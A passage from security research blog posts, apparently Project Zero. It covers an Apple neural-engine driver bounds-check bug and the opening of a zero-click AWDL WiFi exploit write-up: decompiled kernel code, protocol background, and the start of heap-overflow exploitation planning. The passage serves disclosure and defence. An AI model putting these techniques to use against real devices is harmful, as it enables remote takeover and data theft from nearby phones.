I was of course quite excited at this development, but it turned out that the bug was a pretty trivial NULL pointer dereference; not exploitable on iOS. And further fuzzing didn't seem to trigger anything else interesting. So, with other more interesting projects mounting, I sent a quick non-security report to Apple alerting that this area of the code could be problematic and then turned away from H11ANEInDirectPathClient.

Once more, with symbols

Fast forward to the end of August.


As had happened before with the iOS 12 beta, Apple had accidentally included a symbolicated kernelcache in some of the iOS 14 beta releases. I hadn't had a chance to dig into them yet, but I figured that the addition of symbols (and in particular the limited type information that could be inferred from mangled C++ method names) would make reversing the web of multi-thousand-line H11ANEIn functions faster and thus more worthwhile. So, I opened IDA and jumped once again to the external method tables to see if there were any obvious changes.


But almost immediately, something about the external method tables caught my eye:



Oddly, the external method tables for both H11ANEInDirectPathClient and H11ANEInUserClient had defined symbols. This was weird: I had expected the code would consist of a single array of IOExternalMethodDispatch structs, so that H11ANEInDirectPathClient could claim the 34 methods starting at index 0 while H11ANEInUserClient could claim the 34 methods starting at index 3. In such an arrangement, there should only be one symbol, that for the array as a whole.


Then it dawned on me: my notion of overlapping external method arrays was nonsense, and the "sharing" of external methods was a simple out-of-bounds access by H11ANEInDirectPathClient! The less privileged client was supposed to only have 3 methods, but it just so happened that there was a typo in the bounds-check, allowing H11ANEInDirectPathClient to access and call external methods from the more privileged client. And in so doing, each call by H11ANEInDirectPathClient to an H11ANEInUserClient was implicitly triggering a type confusion on the this pointer!


In hindsight, I realized that the "sharing external method arrays" arrangement made no sense: any such use would have to be careful to avoid type confusion between the two classes of user clients, and no such precaution was taking place. This conviction was confirmed when I decompiled H11ANEInDirectPathClient::externalMethod() in the new kernelcache and saw that the bounds check on the selector had decreased from 33 to 2, meaning the bug was now patched.


So, I had missed an issue staring me in the face the whole time, whose existence I had justified by inventing a concept of overlapping method tables. And of course, to add insult to injury, the NULL pointer dereferences I had reported as a non-security issue were only reached by calling two of the out-of-bounds methods.

Another recipe for copypasta

How might this bug have come to exist in the first place? Since the buggy version included the same bounds check for both ::externalMethod() implementations, I suspect this was another case of a copy-paste bug. Here's my guess for what H11ANEInUserClient::externalMethod() actually looks like in Apple's source:


IOReturn H11ANEInUserClient::externalMethod(

    u32 selector, IOExternalMethodArguments *args,

    IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector < H11ANEInUserClient::sMethodCount )

        method = &H11ANEInUserClient::sMethods[selector];

    return super::externalMethod(this, selector, args, method, target);

}


My guess is that this code was copy-pasted to create the H11ANEInDirectPathClient version, but the author accidentally forgot to change the type name in the selector check:


IOReturn H11ANEInDirectPathClient::externalMethod(

    u32 selector, IOExternalMethodArguments *args,

    IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector < H11ANEInUserClient::sMethodCount )

        method = &H11ANEInDirectPathClient::sMethods[selector];

    return super::externalMethod(this, selector, args, method, target);

}


Aside from that, it's mostly a convenient accident that the compiler laid the external method tables back-to-back, making this bug plausibly exploitable (as opposed to past cases of out-of-bounds external methods that I'm aware of). That said, I have not examined the actual exploitability of this issue.

Conclusion

So, what are the takeaways from this story?


First, it's really easy to miss bugs, even ones that you feel should have been obvious. I kicked myself for missing this, given the mental gymnastics I went through to justify why a code pattern like this could exist in the first place. If there's one lesson I've had to teach myself again and again, it's to be inherently suspicious of code and to never assume that it's doing what it does on purpose.


Second, copy-paste is a really quick way to create code, but it's also a quick way to create subtle bugs that, by their nature, are tricky to spot by glancing at the source code. It's easy to tell that 2 arrays are "overlapping" by looking in a disassembler, but it's harder to see that the wrong one of two very similar class names was used in copy-pasted code. While it doesn't solve the problem 100%, it can help to decompose copy-pasted code patterns into reusable helper functions.


Finally, even though I only realized that there was a bug when I looked at the symbolicated kernelcache, I don't want Apple to get the impression that releasing symbols is a security risk. Security researchers rejoice when Apple accidentally releases symbolicated kernelcaches or development libraries, but this is just because it saves time reversing, not because it makes things newly reversible. Any capable attacker will find bugs regardless of the presence or absence of symbols; all the lack of symbols does is keep the bug away from eyes (like mine) that might report it. Hence, withholding symbols is an incredibly weak protection, only deterring the lowest tiers of attackers and serving to make the bugs that have been found last longer.


An iOS zero-click radio proximity exploit odyssey

Posted by Ian Beer, Project Zero


NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 13.5 in May 2020.


In this demo I remotely trigger an unauthenticated kernel memory corruption vulnerability which causes all iOS devices in radio-proximity to reboot, with no user interaction. Over the next 30'000 words I'll cover the entire process to go from this basic demo to successfully exploiting this vulnerability in order to run arbitrary code on any nearby iOS device and steal all the user data

Introduction

Quoting @halvarflake's Offensivecon keynote from February 2020:


"Exploits are the closest thing to "magic spells" we experience in the real world: Construct the right incantation, gain remote control over device."


For 6 months of 2020, while locked down in the corner of my bedroom surrounded by my lovely, screaming children, I've been working on a magic spell of my own. No, sadly not an incantation to convince the kids to sleep in until 9am every morning, but instead a wormable radio-proximity exploit which allows me to gain complete control over any iPhone in my vicinity. View all the photos, read all the email, copy all the private messages and monitor everything which happens on there in real-time. 


The takeaway from this project should not be: no one will spend six months of their life just to hack my phone, I'm fine.


Instead, it should be: one person, working alone in their bedroom, was able to build a capability which would allow them to seriously compromise iPhone users they'd come into close contact with.


Imagine the sense of power an attacker with such a capability must feel. As we all pour more and more of our souls into these devices, an attacker can gain a treasure trove of information on an unsuspecting target.


What's more, with directional antennas, higher transmission powers and sensitive receivers the range of such attacks can be considerable.


I have no evidence that these issues were exploited in the wild; I found them myself through manual reverse engineering. But we do know that exploit vendors seemed to take notice of these fixes. For example, take this tweet from Mark Dowd, the co-founder of Azimuth Security, an Australian "market-leading information security business":



This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL


The vulnerability Mark is referencing here is one of the vulnerabilities I reported to Apple. You don't notice a fix like that without having a deep interest in this particular code.


This Vice article from 2018 gives a good overview of Azimuth and why they might be interested in such vulnerabilities. You might trust that Azimuth's judgement of their customers aligns with your personal and political beliefs, you might not, that's not the point. Unpatched vulnerabilities aren't like physical territory, occupied by only one side. Everyone can exploit an unpatched vulnerability and Mark Dowd wasn't the only person to start tweeting about vulnerabilities in AWDL.


This has been the longest solo exploitation project I've ever worked on, taking around half a year. But it's important to emphasize up front that the teams and companies supplying the global trade in cyberweapons like this one aren't typically just individuals working alone. They're well-resourced and focused teams of collaborating experts, each with their own specialization. They aren't starting with absolutely no clue how bluetooth or wifi work. They also potentially have access to information and hardware I simply don't have, like development devices, special cables, leaked source code, symbols files and so on.


Of course, an iPhone isn't designed to allow people to build capabilities like this. So what went so wrong that it was possible? Unfortunately, it's the same old story. A fairly trivial buffer overflow programming error in C++ code in the kernel parsing untrusted data, exposed to remote attackers.


In fact, this entire exploit uses just a single memory corruption vulnerability to compromise the flagship iPhone 11 Pro device. With just this one issue I was able to defeat all the mitigations in order to remotely gain native code execution and kernel memory read and write.


Relative to the size and complexity of these codebases of major tech companies, the sizes of the security teams dedicated to proactively auditing their product's source code to look for vulnerabilities are very small. Android and iOS are complete custom tech stacks. It's not just kernels and device drivers but dozens of attacker-reachable apps, hundreds of services and thousands of libraries running on devices with customized hardware and firmware.


Actually reading all the code, including every new line in addition to the decades of legacy code, is unrealistic, at least with the division of resources commonly seen in tech where the ratio of security engineers to developers might be 1:20, 1:40 or even higher.


To tackle this insurmountable challenge, security teams rightly place a heavy emphasis on design level review of new features. This is sensible: getting stuff right at the design phase can help limit the impact of the mistakes and bugs which will inevitably occur. For example, ensuring that a new hardware peripheral like a GPU can only ever access a restricted portion of physical memory helps constrain the worst-case outcome if the GPU is compromised by an attacker. The attacker is hopefully forced to find an additional vulnerability to "lengthen the exploit chain", having to use an ever-increasing number of vulnerabilities to hack a single device. Retrofitting constraints like this to already-shipping features would be much harder, if not impossible.


In addition to design-level reviews, security teams tackle the complexity of their products by attempting to constrain what an attacker might be able to do with a vulnerability. These are mitigations. They take many forms and can be general, like stack cookies or application specific, like Structure ID in JavaScriptCore. The guarantees which can be made by mitigations are generally weaker than those made by design-level features but the goal is similar: to "lengthen the exploit chain", hopefully forcing an attacker to find a new vulnerability and incur some cost.


The third approach widely used by defensive teams is fuzzing, which attempts to emulate an attacker's vulnerability finding process with brute force. Fuzzing is often misunderstood as an effective method to discover easy-to-find vulnerabilities or "low-hanging fruit". A more precise description would be that fuzzing is an effective method to discover easy-to-fuzz vulnerabilities. Plenty of vulnerabilities which a skilled vulnerability researcher would consider low-hanging fruit can require reaching a program point that no fuzzer today will be able to reach, no matter the compute resources used.


The problem for tech companies and certainly not unique to Apple, is that while design review, mitigations, and fuzzing are necessary for building secure codebases, they are far from sufficient.


Fuzzers cannot reason about code in the same way a skilled vulnerability researcher can. This means that without concerted manual effort, vulnerabilities with a relatively low cost-of-discovery remain fairly prevalent. A major focus of my work over the last few years had been attempting to highlight that the iOS codebase, just like any other major modern operating system, has a high vulnerability density. Not only that, but there's a high density of "good bugs", that is, vulnerabilities which enable the creation of powerful weird machines.


This notion of "good bugs" is something that offensive researchers understand intuitively but something which might be hard to grasp for those without an exploit development background. Thomas Dullien's weird machines paper provides the best introduction to the notion of weird machines and their applicability to exploitation. Given a sufficiently complex state machine operating on attacker-controlled input, a "good bug" allows the attacker-controlled input to instead become "code", with the "good bug" introducing a new, unexpected state transition into a new, unintended state machine. The art of exploitation then becomes the art of determining how one can use vulnerabilities to introduce sufficiently powerful new state transitions such that, as an end goal, the attacker-supplied input becomes code for a new, weird machine capable of arbitrary system interactions.


It's with this weird machine that mitigations will be defeated; even a mitigation without implementation flaws is usually no match for a sufficiently powerful weird machine. An attacker looking for vulnerabilities is looking specifically for weird machine primitives. Their auditing process is focused on a particular attack-surface and particular vulnerability classes. This stands in stark contrast to a product security team with responsibility for every possible attack surface and every vulnerability class.


As things stand now in November 2020, I believe it's still quite possible for a motivated attacker with just one vulnerability to build a sufficiently powerful weird machine to completely, remotely compromise top-of-the-range iPhones. In fact, the parts of that process which are hardest probably aren't those which you might expect, at least not without an appreciation for weird machines.


Vulnerability discovery remains a fairly linear function of time invested. Defeating mitigations remains a matter of building a sufficiently powerful weird machine. Concretely, Pointer Authentication Codes (PAC) meant I could no longer take the popular direct shortcut to a very powerful weird machine via trivial program counter control and ROP or JOP. Instead I built a remote arbitrary memory read and write primitive which in practise is just as powerful and something which the current implementation of PAC, which focuses almost exclusively on restricting control-flow, wasn't designed to mitigate.


Secure system design didn't save the day because of the inevitable tradeoffs involved in building shippable products. Should such a complex parser driving multiple, complex state machines really be running in kernel context against untrusted, remote input? Ideally, no, and this was almost certainly flagged during a design review. But there are tight timing constraints for this particular feature which means isolating the parser is non-trivial. It's certainly possible, but that would be a major engineering challenge far beyond the scope of the feature itself. At the end of the day, it's features which sell phones and this feature is undoubtedly very cool; I can completely understand the judgement call which was made to allow this design despite the risks.


But risk means there are consequences if things don't go as expected. When it comes to software vulnerabilities it can be hard to connect the dots between those risks which were accepted and the consequences. I don't know if I'm the only one who found these vulnerabilities, though I'm the first to tell Apple about them and work with Apple to fix them. Over the next 30'000 words I'll show you what I was able to do with a single vulnerability in this attack surface and hopefully give you a new or renewed insight into the power of the weird machine.


I don't think all hope is lost; there's just an awful lot more left to do. In the conclusion I'll try to share some ideas for what I think might be required to build a more secure iPhone.


If you want to follow along you can find details attached to issue 1982 in the Project Zero issue tracker.

Vulnerability discovery

In 2018 Apple shipped an iOS beta build without stripping function name symbols from the kernelcache. While this was almost certainly an error, events like this help researchers on the defending side enormously. One of the ways I like to procrastinate is to scroll through this enormous list of symbols, reading bits of assembly here and there. One day I was looking through IDA's cross-references to memmove with no particular target in mind when something jumped out as being worth a closer look:


IDA Pro's cross references window shows a large number of calls to memmove. A callsite in IO80211AWDLPeer::parseAwdlSyncTreeTLV is highlighted


Having function names provides a huge amount of missing context for the vulnerability researcher. A completely stripped 30+MB binary blob such as the iOS kernelcache can be overwhelming. There's a huge amount of work to determine how everything fits together. What bits of code are exposed to attackers? What sanity checking is happening and where? What execution context are different parts of the code running in?


In this case this particular driver is also available on MacOS, where function name symbols are not stripped.


There are three things which made this highlighted function stand out to me:


1) The function name:


IO80211AWDLPeer::parseAwdlSyncTreeTLV


At this point, I had no idea what AWDL was. But I did know that TLVs (Type, Length, Value) are often used to give structure to data, and parsing a TLV might mean it's coming from somewhere untrusted. And the 80211 is a giveaway that this probably has something to do with WiFi. Worth a closer look. Here's the raw decompilation from Hex-Rays which we'll clean up later:


__int64 __fastcall IO80211AWDLPeer::parseAwdlSyncTreeTLV(__int64 this, __int64 buf)

{

  const void *v3; // x20

  _DWORD *v4; // x21

  int v5; // w8

  unsigned __int16 v6; // w25

  unsigned __int64 some_u16; // x24

  int v8; // w21

  __int64 v9; // x8

  __int64 v10; // x9

  unsigned __int8 *v11; // x21

 

  v3 = (const void *)(buf + 3);

  v4 = (_DWORD *)(this + 1203);

  v5 = *(_DWORD *)(this + 1203);

  if ( ((v5 + 1) & 0xFFFFu) <= 0xA )

    v6 = v5 + 1;

  else

    v6 = 10;

  some_u16 = *(unsigned __int16 *)(buf + 1) / 6uLL;

  if ( (_DWORD)some_u16 == v6 )

  {

    some_u16 = v6;

  }

  else

  {

    IO80211Peer::logDebug(

      this,

      0x8000000000000uLL,

      "Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u \n",

      *(unsigned __int8 *)(this + 32),

      *(unsigned __int8 *)(this + 33),

      *(unsigned __int8 *)(this + 34),

      *(unsigned __int8 *)(this + 35),

      *(unsigned __int8 *)(this + 36),

      *(unsigned __int8 *)(this + 37),

      v6,

      some_u16);

    *v4 = some_u16;

    v6 = some_u16;

  }

  v8 = memcmp((const void *)(this + 5520), v3, (unsigned int)(6 * some_u16));

  memmove((void *)(this + 5520), v3, (unsigned int)(6 * some_u16));


Definitely looks like it's parsing something. There's some fiddly byte manipulation; something which sort of looks like a bounds check and an error message.


2) The second thing which stands out is the error message string:


"Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u\n" 


Any kind of LENGTH error sounds like fun to me. Especially when you look a little closer...


3) The control flow graph.


Reading the code a bit more closely it appears that although the log message contains the word "error" there's nothing which is being treated as an error condition here. IO80211Peer::logDebug isn't a fatal logging API, it just logs the message string. Tracing back the length value which is passed to memmove, regardless of which path is taken we still end up with what looks like an arbitrary u16 value from the input buffer (rounded down to the nearest multiple of 6) passed as the length argument to memmove.


Can it really be this easy? Typically, in my experience, bugs this shallow in real attack surfaces tend to not work out. There's usually a length check somewhere far away; you'll spend a few days trying to work out why you can't seem to reach the code with a bad size until you find it and realize this was a CVE from a decade ago. Still, worth a try.


But what even is this attack surface?

A first proof-of-concept

A bit of googling later we learn that awdl is a type of welsh poetry, and also an acronym for an Apple-proprietary mesh networking protocol probably called Apple Wireless Direct Link. It appears to be used by AirDrop amongst other things.


The first goal is to determine whether we can really trigger this vulnerability remotely.


We can see from the casts in the parseAwdlSyncTreeTLV method that the type-length-value objects have a single-byte type then a two-byte length followed by a payload value.


In IDA selecting the function name and going View -> Open subviews -> Cross references (or pressing 'x') shows IDA only found one caller of this method:


IO80211AWDLPeer::actionFrameReport

...

      case 0x14u:

        if (v109[20] >= 2)

          goto LABEL_126;

        ++v109[0x14];

        IO80211AWDLPeer::parseAwdlSyncTreeTLV(this, bytes);


So 0x14 is probably the type value, and v109 looks like it's probably counting the number of these TLVs.


Looking in the list of function names we can also see that there's a corresponding BuildSyncTreeTlv method. If we could get two machines to join an AWDL network, could we just use the MacOS kernel debugger to make the SyncTree TLV very large before it's sent?


Yes, you can. Using two MacOS laptops and enabling AirDrop on both of them I used a kernel debugger to edit the SyncTree TLV sent by one of the laptops, which caused the other one to kernel panic due to an out-of-bounds memmove.


If you're interested in exactly how to do that take a look at the original vulnerability report I sent to Apple on November 29th 2019. This vulnerability was fixed as CVE-2020-3843 on January 28th 2020 in iOS 13.1.1/MacOS 10.15.3.


Our journey is only just beginning. Getting from here to running an implant on an iPhone 11 Pro with no user interaction is going to take a while...

Prior Art

There are a series of papers from the Secure Mobile Networking Lab at TU Darmstadt in Germany (also known as SEEMOO) which look at AWDL. The researchers there have done a considerable amount of reverse engineering (in addition to having access to some leaked Broadcom source code) to produce these papers; they are invaluable to understand AWDL and pretty much the only resources out there. 


The first paper One Billion Apples’ Secret Sauce: Recipe for the Apple Wireless Direct Link Ad hoc Protocol covers the format of the frames used by AWDL and the operation of the channel-hopping mechanism.


The second paper A Billion Open Interfaces for Eve and Mallory: MitM, DoS, and Tracking Attacks on iOS and macOS Through Apple Wireless Direct Link focuses more on Airdrop, one of the OS features which uses AWDL. This paper also examines how Airdrop uses Bluetooth Low Energy advertisements to enable AWDL interfaces on other devices.


The research group wrote an open source AWDL client called OWL (Open Wireless Link). Although I was unable to get OWL to work it was nevertheless an invaluable reference and I did use some of their frame definitions.

What is AWDL?

AWDL is an Apple-proprietary mesh networking protocol designed to allow Apple devices like iPhones, iPads, Macs and Apple Watches to form ad-hoc peer-to-peer mesh networks. Chances are that if you own an Apple device you're creating or connecting to these transient mesh networks multiple times a day without even realizing it.


If you've ever used Airdrop, streamed music to your Homepod or Apple TV via Airplay or used your iPad as a secondary display with Sidecar then you've been using AWDL. And even if you haven't been using those features, if people nearby have been then it's quite possible your device joined the AWDL mesh network they were using anyway.


AWDL isn't a custom radio protocol; the radio layer is WiFi (specifically 802.11g and 802.11a). 


Most people's experience with WiFi involves connecting to an infrastructure network. At home you might plug a WiFi access point into your modem which creates a WiFi network. The access point broadcasts a network name and accepts clients on a particular channel.


To reach other devices on the internet you send WiFi frames to the access point (1). The access point sends them to the modem (2) and the modem sends them to your ISP (3,4) which sends them to the internet:



The topology of a typical home network


To reach other devices on your home WiFi network you send WiFi frames to the access point and the access point relays them to the other devices:


WiFi clients communicate via an access point, even if they are within WiFi range of each other


In reality the wireless signals don't propagate as straight lines between the client and access point but spread out in space such that the two client devices may be able to see the frames transmitted by each other to the access point.


If WiFi client devices can already send WiFi frames directly to each other, then why have the access point at all? Without the complexity of the access point you could certainly have much more magical experiences which "just work", requiring no physical setup.


There are various protocols for doing just this, each with their own tradeoffs. Tunneled Direct Link Setup (TDLS) allows two devices already on the same WiFi network to negotiate a direct connection to each other such that frames won't be relayed by the access point.


Wi-Fi Direct allows two devices not already on the same network to establish an encrypted peer-to-peer Wi-Fi network, using WPS to bootstrap a WPA2-encrypted ad-hoc network.


Apple's AWDL doesn't require peers to already be on the same network to establish a peer-to-peer connection, but unlike Wi-Fi Direct, AWDL has no built-in encryption. Unlike TDLS and Wi-Fi Direct, AWDL networks can contain more than two peers and they can also form a mesh network configuration where multiple hops are required.


AWDL has one more trick up its sleeve: an AWDL client can be connected to an AWDL mesh network and a regular AP-based infrastructure network at the same time, using only one Wi-Fi chipset and antenna. To see how that works we need to look a little more at some Wi-Fi fundamentals.



TDLS

Wi-Fi Direct

AWDL

Requires AP network

Yes

No

No

Encrypted

Yes

Yes

No

Peer Limit

2

2

Unlimited

Concurrent AP Connection Possible

No

No

Yes

WiFi fundamentals

There are over 20 years of WiFi standards spanning different frequency ranges of the electromagnetic spectrum, from as low as 54MHz in 802.11af up to over 60GHz in 802.11ad. Such networks are quite esoteric and consumer equipment uses frequencies near 2.4 Ghz or 5 Ghz. Ranges of frequencies are split into channels: for example in 802.11g channel 6 means a 22 Mhz range between 2.426 GHz and 2.448 GHz.


Newer 5 GHz standards like 802.11ac allow for wider channels up to 160 MHz; 5 Ghz channel numbers therefore encode both the center frequency and channel width. Channel 44 is a 20 MHz range between 5.210 Ghz and 5.230 Ghz whereas channel 46 is a 40 Mhz range which starts at the same lower frequency as channel 44 of 5.210 GHz but extends up to 5.250 GHz.


AWDL typically sends and receives frames on channel 6 and 44. How does that work if you're also using your home WiFi network on a different channel?

Channel Hopping and Time Division Multiplexing

In order to appear to be connected to two separate networks on separate frequencies at the same time, AWDL-capable devices split time into 16ms chunks and tell the WiFi controller chip to quickly switch between the channel for the infrastructure network and the channel being used by AWDL:



A typical AWDL channel hopping sequence, alternating between small periods on AWDL social channels and longer periods on the AP channel


The actual channel sequence is dynamic. Peers broadcast their channel sequences and adapt their own sequence to match peers with which they wish to communicate. The periods when an AWDL peer is listening on an AWDL channel are known as Availability Windows.


In this way the device can appear to be connected to the access point whilst also participating in the AWDL mesh at the same time. Of course, frames might be missed from both the AP and the AWDL mesh but the protocols are treating radio as an unreliable transport anyway so this only really has an impact on throughput. A large part of the AWDL protocol involves trying to synchronize the channel switching between peers to improve throughput.


The SEEMOO labs paper has a much more detailed look at the AWDL channel hopping mechanism.

AWDL frames

These are the first software-controlled fields which go over the air in a WiFi frame:


struct ieee80211_hdr {

  uint16_t frame_control;

  uint16_t duration_id;

  struct ether_addr dst_addr;

  struct ether_addr src_addr;

  struct ether_addr bssid_addr;

  uint16_t seq_ctrl;

} __attribute__((packed));


The first word contains fields which define the type of this frame. These are broadly split into three frame families: Management, Control and Data. The building blocks of AWDL use a subtype of Management frames called Action frames.


The address fields in an 802.11 header can have different meanings depending on the context; for our purposes the first is the destination device MAC address, the second is the source device MAC and the third is the MAC address of the infrastructure network access point or BSSID.


Since AWDL is a peer-to-peer network and doesn't use an access point, the BSSID field of an AWDL frame is set to the hard-coded AWDL BSSID MAC of 00:25:00:ff:94:73. It's this BSSID which AWDL clients are looking for when they're trying to find other peers. Your router won't accidentally use this BSSID because Apple owns the 00:25:00 OUI.


The format of the bytes following the header depends on the frame type. For an Action frame the next byte is a category field. There are a large number of categories which allow devices to exchange all kinds of information. For example category 5 covers various types of radio measurements like noise histograms.


The special category value 0x7f defines this frame as a vendor-specific action frame meaning that the next three bytes are the OUI of the vendor responsible for this custom action frame format.


Apple owns the OUI 0x00 0x17 0xf2 and this is the OUI used for AWDL action frames. Every byte in the frame after this is now proprietary, defined by Apple rather than an IEEE standard.


The SEEMOO labs team have done a great job reversing the AWDL action frame format and they developed a wireshark dissector.


AWDL Action frames have a fixed-sized header followed by a variable length collection of TLVs:



The layout of fields in an AWDL frame: 802.11 header, action frame header, AWDL fixed header and variable length AWDL payload


Each TLV has a single-byte type followed by a two-byte length which is the length of the variable-sized payload in bytes.


There are two types of AWDL action frame: Master Indication Frames (MIF) and Periodic Synchronization Frames (PSF). They differ only in their type field and the collection of TLVs they contain.


An AWDL mesh network has a single master node decided by an election process. Each node broadcasts a MIF containing a master metric parameter; the node with the highest metric becomes the master node. It is this master node's PSF timing values which should be adopted as the true timing values for all the other nodes to synchronize to; in this way their availability windows can overlap and the network can have a higher throughput.

Frame processing

Back in 2017, Project Zero researcher Gal Beniamini published a seminal 5-part blog post series entitled Over The Air where he exploited a vulnerability in the Broadcom WiFi chipset to gain native code execution on the WiFi controller, then pivoted via an iOS kernel bug in the chipset-to-Application Processor interface to achieve arbitrary kernel memory read/write.


In that case, Gal targeted a vulnerability in the Broadcom firmware when it was parsing data structures related to TDLS. The raw form of these data structures was handled by the chipset firmware itself and never made it to the application processor.


In contrast, for AWDL the frames appear to be parsed in their entirety on the Application Processor by the kernel driver. Whilst this means we can explore a lot of the AWDL code, it also means that we're going to have to build the entire exploit on top of primitives we can build with the AWDL parser, and those primitives will have to be powerful enough to remotely compromise the device. Apple continues to ship new mitigations with each iOS release and hardware revision, and we're of course going to target the latest iPhone 11 Pro with the largest collection of these mitigations in place.


Can we really build something powerful enough to remotely defeat kernel pointer authentication just with a linear heap overflow in a WiFi frame parser? Defeating mitigations usually involves building up a library of tricks to help build more and more powerful primitives. You might start with a linear heap overflow and use it to build an arbitrary read, then use that to help build an arbitrary bit flip primitive and so on.


I've built a library of tricks and techniques like this for doing local privilege escalations on iOS but I'll have to start again from scratch for this brand new attack surface.

A brief tour of the AWDL codebase

The first two C++ classes to familiarize ourselves with are IO80211AWDLPeer and IO80211AWDLPeerManager. There's one IO80211AWDLPeer object for each AWDL peer which a device has recently received a frame from. A background timer destroys inactive IO80211AWDLPeer objects. There's a single instance of the IO80211AWDLPeerManager which is responsible for orchestrating interactions between this device and other peers.


Note that although we have some function names from the iOS 12 beta 1 kernelcache and the MacOS IO80211Family driver we don't have object layout information. Brandon Azad pointed out that the MacOS prelinked kernel image does contain some structure layout information in the __CTF.__ctf section which can be parsed by the dtrace ctfdump tool. Unfortunately this seems to only contain structures from the open source XNU code.


The sizes of OSObject-based IOKit objects can easily be determined statically but the names and types of individual fields cannot. One of the most time-consuming tasks of this whole project was the painstaking process of reverse engineering the types and meanings of a huge number of the fields in these objects. Each IO80211AWDLPeer object is almost 6KB; that's a lot of potential fields. Having structure layout information would probably have saved months.


If you're a defender building a threat model don't interpret this the wrong way: I would assume any competent real-world exploit development team has this information; either from images or devices with full debug symbols they have acquired with or without Apple's consent, insider access, or even just from monitoring every single firmware image ever publicly released to check whether debug symbols were released by accident. Larger groups could even have people dedicated to building custom reversing tools.


Six years ago I had hoped Project Zero would be able to get legitimate access to data sources like this. Six years later and I am still spending months reversing structure layouts and naming variables.


We'll take IO80211AWDLPeerManager::actionFrameInput as the point where untrusted raw AWDL frame data starts being parsed. There is actually a separate, earlier processing layer in the WiFi chipset driver but its parsing is minimal.


Each frame received while the device is listening on a social channel which was sent to the AWDL BSSID ends up at actionFrameInput, wrapped in an mbuf structure. Mbufs are an anachronistic data structure used for wrapping collections of networking buffers. The mbuf API is the stuff of nightmares, but that's not in scope for this blogpost.


The mbuf buffers are concatenated to get a contiguous frame in memory for parsing, then IO80211PeerManager::findPeer is called, passing the source MAC address from the received frame:


IO80211AWDLPeer*

IO80211PeerManager::findPeer(struct ether_addr *peer_mac)


If an AWDL frame has recently been received from this source MAC then this function returns a pointer to an existing IO80211AWDLPeer structure representing the peer with that MAC. The IO80211AWDLPeerManager uses a fairly complicated priority queue data structure called IO80211CommandQueue to store pointers to these currently active peers.


If the peer isn't found in the IO80211AWDLPeerManager's queue of peers then a new IO80211AWDLPeer object is allocated to represent this new peer and it's inserted into the IO80211AWDLPeerManager's peers queue.


Once a suitable peer object has been found the IO80211AWDLPeerManager then calls the actionFrameReport method on the IO80211AWDLPeer so that it can handle the action frame.


This method is responsible for most of the AWDL action frame handling and contains most of the untrusted parsing. It first updates some timestamps then reads various fields from TLVs in the frame using the IO80211AWDLPeerManager::getTlvPtrForType method to extract them directly from the mbuf. After this initial parsing comes the main loop which takes each TLV in turn and parses it.


First each TLV is passed to IO80211AWDLPeer::tlvCheckBounds. This method has a hardcoded list of specific minimum and maximum TLV lengths for some of the supported TLV types. For types not explicitly listed it enforces a maximum length of 1024 bytes. I mentioned earlier that I often encounter code constructs which look like shallow memory corruption only to later discover a bounds check far away. This is exactly that kind of construct, and is in fact where Apple added a bounds check in the patch.


Type 0x14 (which has the vulnerability in the parser) isn't explicitly listed in tlvCheckBounds so it gets the default upper length limit of 1024, significantly larger than the 60 byte buffer allocated for the destination buffer in the IO80211AWDLPeer structure.


This pattern of separating bounds checks away from parsing code is fragile; it's too easy to forget or not realize that when adding code for a new TLV type it's also a requirement to update the tlvCheckBounds function. If this pattern is used, try to come up with a way to enforce that new code must explicitly declare an upper bound here. One option could be to ensure an enum is used for the type and wrap the tlvCheckBounds method in a pragma to temporarily enable clang's -Wswitch-enum warning as an error:


#pragma clang diagnostic push

#pragma diagnostic error "-Wswitch-enum"

 

IO80211AWDLPeer::tlvCheckBounds(...) {

  switch(tlv->type) {

    case type_a:

      ...;

    case type_b:

      ...;

  }
}

 

#pragma clang diagnostic pop


This causes a compilation error if the switch statement doesn't have an explicit case statement for every value of the tlv->type enum.


Static analysis tools like Semmle can also help here. The EnumSwitch class can be used like in this example code to check whether all enum values are explicitly handled.


If the tlvCheckBounds checks pass then there is a switch statement with a case to parse each supported TLV:


Type

Handler

0x02

IO80211AWDLPeer::processServiceResponseTLV

0x04

IO80211AWDLPeer::parseAwdlSyncParamsTlvAndTakeAction

0x05

IO80211AWDLPeer::parseAwdlElectionParamsV1

0x06

inline parsing of serviceParam

0x07

IO80211Peer::parseHTCapTLV

0x0c

nop

0x10

inline parsing of ARPA

0x11

IO80211Peer::parseVhtCapTLV

0x12

IO80211AWDLPeer::parseAwdlChanSeqFromChanSeqTLV

0x14

IO80211AWDLPeer::parseAwdlSyncTreeTLV

0x15

inline parser extracting 2 bytes

0x16

IO80211AWDLPeer::parseBloomFilterTlv

0x17

inlined parser of NSync

0x1d

IO80211AWDLPeer::parseBssSteeringTlv

SyncTree vulnerability in context

Here's a cleaned up decompilation of the relevant portions of the parseAwdlSyncTreeTLV method which contains the vulnerability:


int

IO80211AWDLPeer::parseAwdlSyncTreeTLV(awdl_tlv* tlv)

{

  u64 new_sync_tree_size;

 

  u32 old_sync_tree_size = this->n_sync_tree_macs + 1;

  if (old_sync_tree_size >= 10 ) {

    old_sync_tree_size = 10;

  }

 

  if (old_sync_tree_size == tlv->len/6 ) {

    new_sync_tree_size = old_sync_tree_size;

  } else {

    new_sync_tree_size = tlv->len/6;

    this->n_sync_tree_macs = new_sync_tree_size;

  }

 

  memcpy(this->sync_tree_macs, &tlv->val[0], 6 * new_sync_tree_size);

 

...


sync_tree_macs is a 60-byte inline array in the IO80211AWDLPeer structure, at offset +0x1648. That's enough space to store 10 MAC addresses. The IO80211AWDLPeer object is 0x16a8 bytes in size which means it will be allocated in the kalloc.6144 zone.


tlvCheckBounds will enforce a maximum value of 1024 for the length of the SyncTree TLV. The TLV parser will round that value down to the nearest multiple of 6 and copy that number of bytes into the sync_tree_macs array at +0x1648. This will be our memory corruption primitive: a linear heap buffer overflow in 6-byte chunks which can corrupt all the fields in the IO80211AWDLPeer object past +0x16a8 and then a few hundred bytes off of the end of the kalloc.6144 zone chunk. We can easily cause IO80211AWDLPeer objects to be allocated next to each other by sending AWDL frames from a large number of different spoofed source MAC addresses in quick succession. This gives us four rough primitives to think about as we start to find a path to exploitation:


1) Corrupting fields after the sync_tree_macs array in the IO80211AWDLPeer object:

